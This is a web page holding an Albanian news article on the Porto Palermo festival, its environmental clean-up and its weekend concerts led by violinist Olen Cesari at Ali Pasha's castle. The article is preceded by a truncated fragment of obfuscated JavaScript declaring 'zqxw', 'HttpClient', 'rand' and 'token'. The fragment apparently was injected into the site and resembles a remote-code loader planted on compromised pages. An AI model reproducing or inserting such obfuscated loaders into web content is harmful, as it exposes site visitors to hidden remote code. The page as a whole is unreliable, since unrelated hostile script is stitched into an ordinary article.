;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Festivali Porto Palermo, në mbrojtje të mjedisit

By

Në këtë vit, festivali Porto Palermo do të bashkojë forcat me organizata të dedikuara ruajtjes së mjedisit për të shenjuar fillimin e edicionit të tretë të tij.

Ky festival synon, jo vetëm të sjellë artistët më të mirë për të performuar në skenën e vet autentike, por edhe të promovojë turizmin e qëndrueshëm kulturor në Shqipëri.

Gjatë dy edicioneve të para, 2021 dhe 2022, fokusi ishte rivitalizimi i kësaj pike turistike dhe zonës së portit.

Festivali nis sot rrugëtimin përmes pastrimit të detit dhe përmirësimit të hapësirës përreth kalasë, besimplotë në krijimin e ndërgjegjësimit te turistët dhe vizitorët dhe duke edukuar të rinjtë drejt një ndikimi të qëndrueshëm.

Festivali i Porto Palermos, ashtu si dhe në edicionet e tjera, do të mbushë kalanë historike të Ali Pashës, fundjavave përgjatë 1 muaji. E vendosur në një ishull të vogël në Gjirin e Porto Palermos, kjo perlë kulturore ndërthur traditën, historinë, detin dhe muzikën në një mjedis mahnitës, shkruan Atsh.

Pikërisht aty violinist i mirënjohur Olen Cesari do të mbledhë një grup artistësh të jashtëzakonshëm, që do të sjellin në jetë kështjellën çdo fundjavë, duke shkrirë modernizmin dhe trashëgiminë shqiptare.

Artikuj të ngjashëm